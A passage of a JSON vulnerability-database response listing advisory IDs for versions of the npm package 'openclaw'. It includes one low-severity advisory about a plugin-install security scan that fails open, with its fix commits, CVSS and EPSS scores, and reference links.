th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-
9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-
qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-
xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-
z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-
tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-34505","GHSA-5m9r-p9g7-679c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kthe-sgfb-kkb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89149?format=json","vulnerability_id":"VCID-kzgh-7f6h-kfd1","summary":"OpenClaw: Security Scan Failure Does Not Block Plugin Installation (Fail-Open)\n## Summary\nSecurity Scan Failure Does Not Block Plugin Installation (Fail-Open)\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Real in shipped v2026.3.28 plugin install flow, but low severity fits because it still requires an operator to choose installation of an untrusted package and the scan failure was visible rather than silent.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7a953a52271b9188a5fa830739a4366614ff9916` — 2026-03-30T15:36:08+01:00\n- `44b993613601280d46a5b88190e46669fc13d669` — 2026-03-31T23:16:11+09:00\n- `0d7f1e2c84eca65df7dee890d9c30e2a841c030a` — 2026-03-31T23:27:20+09:00\n- 
`bf96c67fd1954740aeabfadc7cfe3098bcfc6b68` — 2026-03-31T15:53:29+01:00\n\nOpenClaw thanks @davidluzsilva for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41377","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11725","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11684","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11719","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41377"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/0d7f1e2c84eca65df7dee890d9c30e2a841c030a"},{"reference_url":"https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:
L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/44b993613601280d46a5b88190e46669fc13d669"},{"reference_url":"https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0d7f1e2c84eca65df7dee890d9c30e2a841c030a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVS
S:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/44b993613601280d46a5b88190e46669fc13d669"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7a953a52271b9188a5fa830739a4366614ff9916"},{"reference_url":"https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/commit/bf96c67fd1954740aeabfadc7cfe3098bcfc6b68"},{"reference_url":"https://github.com/open
claw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:53:31Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwq8-6f96-g3q4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41377","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41377"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2
026-04-29T19:53:31Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-fail-open-security-scan-bypass-in-plugin-installation"},{"reference_url":"https://github.com/advisories/GHSA-cwq8-6f96-g3q4","reference_id":"GHSA-cwq8-6f96-g3q4","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwq8-6f96-g3q4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCI
D-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCI
D-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41377","GHSA-cwq8-6f96-g3q4"],"risk_score":2.3,"exploitability":"0.5","weighted_severity":"4.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kzgh-7f6h-kfd1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50775?format=json","vulnerability_id":"VCID-m46m-y19r-2kd2","summary":"OpenClaw: 